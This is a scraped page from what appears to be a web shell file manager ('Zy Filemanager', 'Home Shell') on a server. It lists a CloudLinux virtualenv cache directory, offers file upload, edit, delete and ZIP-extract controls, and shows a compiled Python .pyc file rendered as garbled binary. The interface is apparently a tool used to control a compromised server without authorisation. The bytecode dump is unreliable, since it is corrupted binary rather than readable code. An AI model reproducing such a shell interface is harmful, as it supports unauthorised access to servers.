⚠️ BACKUP DATA ANDA SECARA TERATUR! File manager ini untuk keperluan teknis.
Zy Filemanager
berang berang bawa gelek berangkat lek !!!
🌙 Dark Mode
🏠 Home Shell
🔄 Refresh
Current Path:
Home Shell
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
virtualenv
/
activation
/
__pycache__
⬆️ Parent Directory
📁 File Browser
Name
Size
Permissions
Modified Date
Actions
📄
__init__.cpython-311.pyc
(722 bytes)
722 B
0644
📅
✏️
✍️
⬇️
🗑️
📄
activator.cpython-311.pyc
(2,395 bytes)
2.34 KB
0644
📅
✏️
✍️
⬇️
🗑️
📄
via_template.cpython-311.pyc
(4,077 bytes)
3.98 KB
0644
📅
✏️
✍️
⬇️
🗑️
📤 Upload Files
Single File
Multiple Files
ZIP Extract
ZIP file will be deleted after extraction
➕ Create New
New Folder
New File
✍️ Editing: activator.cpython-311.pyc
File: /opt/cloudlinux/venv/lib/python3.11/site-packages/virtualenv/activation/__pycache__/activator.cpython-311.pyc
Size: 2.34 KB | Last Modified: 2026-01-20 20:01:48
💾 Backup File
🔢 Toggle Line Numbers
� �|oiX � �B � d dl Z d dlmZmZ G d� de�� � ZdgZdS )� N)�ABCMeta�abstractmethodc �Z � e Zd ZdZd� Zed� � � Zed� � � Zed� � � Z dS )� Activatorz5Generates activate script for the virtual environmentc � � |j dk r0t j � t j � � � � n|j | _ dS )z�Create a new activator generator. :param options: the parsed options as defined within :meth:`add_parser_arguments` �.N)�prompt�os�path�basename�getcwd�flag_prompt)�self�optionss �q/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/virtualenv/activation/activator.py�__init__zActivator.__init__ s>